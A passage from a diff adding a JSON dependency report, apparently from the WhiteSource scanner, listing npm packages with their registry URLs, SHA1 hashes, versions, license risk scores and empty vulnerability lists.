"patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/mimic-fn" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f208b079-539e-415a-aa21-4fdcc55eecae", + "keyId": 26954938, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/hmac-drbg/-/hmac-drbg-1.0.1.tgz", + "homePage": "https://github.com/indutny/hmac-drbg#readme", + "genericPackageIndex": "https://www.npmjs.org/package/hmac-drbg" + }, + "matchType": "SHA1", + "sha1": "d2745701025a6c775a6c545793ed502fc0c649a1", + "name": "hmac-drbg-1.0.1.tgz", + "artifactId": "hmac-drbg-1.0.1.tgz", + "version": "1.0.1", + "groupId": "hmac-drbg", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/hmac-drbg/v/1.0.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "220284e5-8701-490f-b8ab-285dedef114d", + "keyId": 26967006, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/p-locate/-/p-locate-3.0.0.tgz", + "homePage": "https://github.com/sindresorhus/p-locate#readme", + "genericPackageIndex": "https://www.npmjs.org/package/p-locate" + }, + "matchType": "SHA1", + "sha1": "322d69a05c0264b25997d9f40cd8a891ab0064a4", + "name": "p-locate-3.0.0.tgz", + "artifactId": "p-locate-3.0.0.tgz", + "version": "3.0.0", + "groupId": "p-locate", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/f3a89143-d4ce-4e38-992d-36ebde3e9075" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "0d14fc8c-8704-4153-b4af-d3ea40d1849b", + "keyId": 26955519, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/unzip-response/-/unzip-response-2.0.1.tgz", + "homePage": "https://github.com/sindresorhus/unzip-response#readme", + "genericPackageIndex": "https://www.npmjs.org/package/unzip-response" + }, + "matchType": "SHA1", + "sha1": "d2f0f737d16b0615e72a6935ed04214572d56f97", + "name": "unzip-response-2.0.1.tgz", + "artifactId": "unzip-response-2.0.1.tgz", + "version": "2.0.1", + "groupId": "unzip-response", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/unzip-response" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "6671b615-da7f-4a73-b497-f6f061ae9f70", + "keyId": 26955639, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/trim-newlines/-/trim-newlines-1.0.0.tgz", + "homePage": "https://github.com/sindresorhus/trim-newlines", + "genericPackageIndex": "https://www.npmjs.org/package/trim-newlines" + }, + "matchType": "SHA1", + "sha1": "5887966bb582a4503a41eb524f7d35011815a613", + "name": "trim-newlines-1.0.0.tgz", + "artifactId": "trim-newlines-1.0.0.tgz", + "version": "1.0.0", + "groupId": "trim-newlines", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/b4cb9154-a3a0-4cb2-b6fc-6631a839e09e" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4ae34f4f-8f78-48e3-9b8e-9e30643d176d", + "keyId": 26972586, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/jwt-decode/-/jwt-decode-2.2.0.tgz", + "homePage": "https://github.com/auth0/jwt-decode#readme", + "genericPackageIndex": "https://www.npmjs.org/package/jwt-decode" + }, + "matchType": "SHA1", + "sha1": "7d86bd56679f58ce6a84704a657dd392bba81a79", + "name": "jwt-decode-2.2.0.tgz", + "artifactId": "jwt-decode-2.2.0.tgz", + "version": "2.2.0", + "groupId": "jwt-decode", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/5296801e-003a-43d6-8d58-d5a715b27749" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "faaf53a6-3e1c-466c-813e-289f5043f441", + "keyId": 27264563, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/make-dir/-/make-dir-2.1.0.tgz", + "homePage": "https://github.com/sindresorhus/make-dir#readme", + "genericPackageIndex": "https://www.npmjs.org/package/make-dir" + }, + "matchType": "SHA1", + "sha1": "5f0310e18b8be898cc07009295a30ae41e91e6f5", + "name": "make-dir-2.1.0.tgz", + "artifactId": "make-dir-2.1.0.tgz", + "version": "2.1.0", + "groupId": "make-dir", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/make-dir" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "1e8d92df-a24f-4013-bc60-05ded617bd7b", + "keyId": 26955557, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cli-boxes/-/cli-boxes-1.0.0.tgz", + "homePage": "https://github.com/sindresorhus/cli-boxes", + "genericPackageIndex": "https://www.npmjs.org/package/cli-boxes" + }, + "matchType": "SHA1", + "sha1": "4fa917c3e59c94a004cd61f8ee509da651687143", + "name": "cli-boxes-1.0.0.tgz", + "artifactId": "cli-boxes-1.0.0.tgz", + "version": "1.0.0", + "groupId": "cli-boxes", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/28e172fc-6b3a-4011-9571-5ab5097b2e20" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e3b18fd1-f0c0-442a-a770-89883237f89b", + "keyId": 26955769, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/escape-html/-/escape-html-1.0.3.tgz", + "homePage": "https://github.com/component/escape-html", + "genericPackageIndex": "https://www.npmjs.org/package/escape-html" + }, + "matchType": "SHA1", + "sha1": "0258eae4d3d0c0974de1c169188ef0051d1d1988", + "name": "escape-html-1.0.3.tgz", + "artifactId": "escape-html-1.0.3.tgz", + "version": "1.0.3", + "groupId": "escape-html", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/escape-html/v/1.0.3" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "65f989cb-bb9d-47b3-9d7b-817b51afe945", + "keyId": 26955141, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/url/-/url-0.11.0.tgz", + "homePage": "https://github.com/defunctzombie/node-url#readme", + "genericPackageIndex": "https://www.npmjs.org/package/url" + }, + "matchType": "SHA1", + "sha1": "3838e97cfc60521eb73c525a8e55bfdd9e2e28f1", + "name": "url-0.11.0.tgz", + "artifactId": "url-0.11.0.tgz", + "version": "0.11.0", + "groupId": "url", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/url/v/0.11.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "332adc15-f091-418c-b351-5a0261c59a48", + "keyId": 26955672, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/package-json/-/package-json-4.0.1.tgz", + "homePage": "https://github.com/sindresorhus/package-json#readme", + "genericPackageIndex": "https://www.npmjs.org/package/package-json" + }, + "matchType": "SHA1", + "sha1": "8869a0401253661c4c4ca3da6c2121ed555f5eed", + "name": "package-json-4.0.1.tgz", + "artifactId": "package-json-4.0.1.tgz", + "version": "4.0.1", + "groupId": "package-json", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/073d3cd8-a1a8-44b6-996d-328fdc558cd6" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "260aa020-ab80-4c81-88a0-57cabb1e31a0", + "keyId": 26965500, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.2.0.tgz", + "homePage": "https://github.com/kemitchell/spdx-exceptions.json#readme", + "genericPackageIndex": "https://www.npmjs.org/package/spdx-exceptions" + }, + "matchType": "SHA1", + "sha1": "2ea450aee74f2a89bfb94519c07fcd6f41322977", + "name": "spdx-exceptions-2.2.0.tgz", + "artifactId": "spdx-exceptions-2.2.0.tgz", + "version": "2.2.0", + "groupId": "spdx-exceptions", + "licenses": [ + { + "name": "CC BY 3.0", + "url": "http://spdx.org/licenses/CC-BY-3.0", + "riskLevel": "unknown", + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/spdx-exceptions" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "163cccc0-5833-4b7f-8f25-9ce74fe12095", + "keyId": 27607401, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@ndhoule/map/-/map-2.0.1.tgz", + "homePage": "https://github.com/ndhoule/map", + "genericPackageIndex": "https://www.npmjs.org/package/@ndhoule/map" + }, + "matchType": "SHA1", + "sha1": "f5ca0a47424ea67f46e2a6d499b9e9bc886aefa8", + "name": "map-2.0.1.tgz", + "artifactId": "map-2.0.1.tgz", + "version": "2.0.1", + "groupId": "@ndhoule/map", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@ndhoule/map/v/2.0.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "be481d35-2aea-4edf-8c05-c87bd6eae8d5", + "keyId": 26954851, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/os-tmpdir/-/os-tmpdir-1.0.2.tgz", + "homePage": "https://github.com/sindresorhus/os-tmpdir#readme", + "genericPackageIndex": "https://www.npmjs.org/package/os-tmpdir" + }, + "matchType": "SHA1", + "sha1": "bbe67406c79aa85c5cfec766fe5734555dfa1274", + "name": "os-tmpdir-1.0.2.tgz", + "artifactId": "os-tmpdir-1.0.2.tgz", + "version": "1.0.2", + "groupId": "os-tmpdir", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/os-tmpdir" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "dfe86ee4-9d48-4c42-a3d8-81cf3b2d442f", + "keyId": 26955219, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/on-finished/-/on-finished-2.3.0.tgz", + "homePage": "https://github.com/jshttp/on-finished", + "genericPackageIndex": "https://www.npmjs.org/package/on-finished" + }, + "matchType": "SHA1", + "sha1": "20f1336481b083cd75337992a16971aa2d906947", + "name": "on-finished-2.3.0.tgz", + "artifactId": "on-finished-2.3.0.tgz", + "version": "2.3.0", + "groupId": "on-finished", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/12d83b6f-b7fb-4897-979f-befee1e78f71" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7835a8fa-cad5-4933-b5d4-8e711d0b509f", + "keyId": 26955565, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/boxen/-/boxen-1.3.0.tgz", + "homePage": "https://github.com/sindresorhus/boxen#readme", + "genericPackageIndex": "https://www.npmjs.org/package/boxen" + }, + "matchType": "SHA1", + "sha1": "55c6c39a8ba58d9c61ad22cd877532deb665a20b", + "name": "boxen-1.3.0.tgz", + "artifactId": "boxen-1.3.0.tgz", + "version": "1.3.0", + "groupId": "boxen", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/boxen/v/1.3.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f84d4695-3361-4c3f-8dab-7e416ac76585", + "keyId": 26950204, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "homePage": "https://github.com/zeit/ms#readme", + "genericPackageIndex": "https://www.npmjs.org/package/ms" + }, + "matchType": "SHA1", + "sha1": "5608aeadfc00be6c2901df5f9861788de0d597c8", + "name": "ms-2.0.0.tgz", + "artifactId": "ms-2.0.0.tgz", + "version": "2.0.0", + "groupId": "ms", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/8b0bd6fc-c032-402b-998e-3fec9f21acdd" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5956a8ef-04c1-4c23-b7fa-4af5910c986b", + "keyId": 26948550, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/is-obj/-/is-obj-1.0.1.tgz", + "homePage": "https://github.com/sindresorhus/is-obj#readme", + "genericPackageIndex": "https://www.npmjs.org/package/is-obj" + }, + "matchType": "SHA1", + "sha1": "3e4729ac1f5fde025cd7d83a896dab9f4f67db0f", + "name": "is-obj-1.0.1.tgz", + "artifactId": "is-obj-1.0.1.tgz", + "version": "1.0.1", + "groupId": "is-obj", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/is-obj" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "26f30e2e-446a-462e-ab80-4a20ae7d3078", + "keyId": 26965596, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/lodash.isinteger/-/lodash.isinteger-4.0.4.tgz", + "homePage": "https://lodash.com/", + "genericPackageIndex": "https://www.npmjs.org/package/lodash.isinteger" + }, + "matchType": "SHA1", + "sha1": "619c0af3d03f8b04c31f5882840b77b11cd68343", + "name": "lodash.isinteger-4.0.4.tgz", + "artifactId": "lodash.isinteger-4.0.4.tgz", + "version": "4.0.4", + "groupId": "lodash.isinteger", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/e9749f7e-c512-491c-892d-6aa72114e5f2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "322a7d07-aec0-46e5-9c89-0ac40fec0bee", + "keyId": 26954782, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/find-cache-dir/-/find-cache-dir-1.0.0.tgz", + "homePage": "https://github.com/avajs/find-cache-dir#readme", + "genericPackageIndex": "https://www.npmjs.org/package/find-cache-dir" + }, + "matchType": "SHA1", + "sha1": "9288e3e9e3cc3748717d39eade17cf71fc30ee6f", + "name": "find-cache-dir-1.0.0.tgz", + "artifactId": "find-cache-dir-1.0.0.tgz", + "version": "1.0.0", + "groupId": "find-cache-dir", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/find-cache-dir/v/1.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8ed494f6-5746-42fd-abd2-6c2bb4215114", + "keyId": 27197068, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/prop-types/-/prop-types-15.7.2.tgz", + "homePage": "https://facebook.github.io/react/", + "genericPackageIndex": "https://www.npmjs.org/package/prop-types" + }, + "matchType": "SHA1", + "sha1": "52c41e75b8c87e72b9d9360e0206b99dcbffa6c5", + "name": "prop-types-15.7.2.tgz", + "artifactId": "prop-types-15.7.2.tgz", + "version": "15.7.2", + "groupId": "prop-types", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/prop-types/v/15.7.2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ec53307d-dadd-4699-8778-9103f734d47f", + "keyId": 27290827, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ieee754/-/ieee754-1.1.13.tgz", + "homePage": "https://github.com/feross/ieee754#readme", + "genericPackageIndex": "https://www.npmjs.org/package/ieee754" + }, + "matchType": "SHA1", + "sha1": "ec168558e95aa181fd87d37f55c32bbcb6708b84", + "name": "ieee754-1.1.13.tgz", + "artifactId": "ieee754-1.1.13.tgz", + "version": "1.1.13", + "groupId": "ieee754", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/ieee754/v/1.1.13" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7d2d65e9-d0c0-41b5-9cb5-045b0e2eea00", + "keyId": 26965564, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/lodash.includes/-/lodash.includes-4.3.0.tgz", + "homePage": "https://lodash.com/", + "genericPackageIndex": "https://www.npmjs.org/package/lodash.includes" + }, + "matchType": "SHA1", + "sha1": "60bb98a87cb923c68ca1e51325483314849f553f", + "name": "lodash.includes-4.3.0.tgz", + "artifactId": "lodash.includes-4.3.0.tgz", + "version": "4.3.0", + "groupId": "lodash.includes", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/lodash.includes/v/4.3.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "587db51d-3f4f-43f7-a957-7e2995a16e73", + "keyId": 27085625, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/loader-utils/-/loader-utils-1.2.3.tgz", + "homePage": "https://github.com/webpack/loader-utils#readme", + "genericPackageIndex": "https://www.npmjs.org/package/loader-utils" + }, + "matchType": "SHA1", + "sha1": "1ff5dc6911c9f0a062531a4c04b609406108c2c7", + "name": "loader-utils-1.2.3.tgz", + "artifactId": "loader-utils-1.2.3.tgz", + "version": "1.2.3", + "groupId": "loader-utils", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/loader-utils" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3821d25f-5f96-4ae5-ba8e-d7ea6efc49ef", + "keyId": 26948756, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/array-uniq/-/array-uniq-1.0.3.tgz", + "homePage": "https://github.com/sindresorhus/array-uniq#readme", + "genericPackageIndex": "https://www.npmjs.org/package/array-uniq" + }, + "matchType": "SHA1", + "sha1": "af6ac877a25cc7f74e058894753858dfdb24fdb6", + "name": "array-uniq-1.0.3.tgz", + "artifactId": "array-uniq-1.0.3.tgz", + "version": "1.0.3", + "groupId": "array-uniq", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/92ece15d-b7d4-4f97-a97a-6fdbe46bf3d1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "6b302f31-df75-4300-9f49-c165da7f89ab", + "keyId": 26955677, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/bn.js/-/bn.js-4.11.8.tgz", + "homePage": "https://github.com/indutny/bn.js", + "genericPackageIndex": "https://www.npmjs.org/package/bn.js" + }, + "matchType": "SHA1", + "sha1": "2cde09eb5ee341f484746bb0309b3253b1b1442f", + "name": "bn.js-4.11.8.tgz", + "artifactId": "bn.js-4.11.8.tgz", + "version": "4.11.8", + "groupId": "bn.js", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/df1660bd-f96a-4ab1-8af9-1b891cd96d95" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "1310035e-aa8d-44b6-8cb1-ef551530c535", + "keyId": 26948491, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "homePage": "https://github.com/nodejs/string_decoder", + "genericPackageIndex": "https://www.npmjs.org/package/string_decoder" + }, + "matchType": "SHA1", + "sha1": "9cf1611ba62685d7030ae9e4ba34149c3af03fc8", + "name": "string_decoder-1.1.1.tgz", + "artifactId": "string_decoder-1.1.1.tgz", + "version": "1.1.1", + "groupId": "string_decoder", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/56bf6852-bd62-4b6e-8912-013b1a6de698" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "0f3c912c-9d28-4e56-a666-9855dac6e40f", + "keyId": 26954686, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/slash/-/slash-1.0.0.tgz", + "homePage": "https://github.com/sindresorhus/slash", + "genericPackageIndex": "https://www.npmjs.org/package/slash" + }, + "matchType": "SHA1", + "sha1": "c41f2f6c39fc16d1cd17ad4b5d896114ae470d55", + "name": "slash-1.0.0.tgz", + "artifactId": "slash-1.0.0.tgz", + "version": "1.0.0", + "groupId": "slash", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://github.com/sindresorhus/slash/blob/v1.0.0/readme.md" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7067f10b-1f07-402b-a90a-b5f350491f54", + "keyId": 26954654, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/timed-out/-/timed-out-4.0.1.tgz", + "homePage": "https://github.com/floatdrop/timed-out#readme", + "genericPackageIndex": "https://www.npmjs.org/package/timed-out" + }, + "matchType": "SHA1", + "sha1": "f32eacac5a175bea25d7fab565ab3ed8741ef56f", + "name": "timed-out-4.0.1.tgz", + "artifactId": "timed-out-4.0.1.tgz", + "version": "4.0.1", + "groupId": "timed-out", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/timed-out/v/4.0.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "16bf38b0-1c9e-4c4f-874d-9748f94c5a3f", + "keyId": 26948401, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", + "homePage": "https://github.com/juliangruber/isarray", + "genericPackageIndex": "https://www.npmjs.org/package/isarray" + }, + "matchType": "SHA1", + "sha1": "bb935d48582cba168c06834957a54a3e07124f11", + "name": "isarray-1.0.0.tgz", + "artifactId": "isarray-1.0.0.tgz", + "version": "1.0.0", + "groupId": "isarray", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/isarray" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": 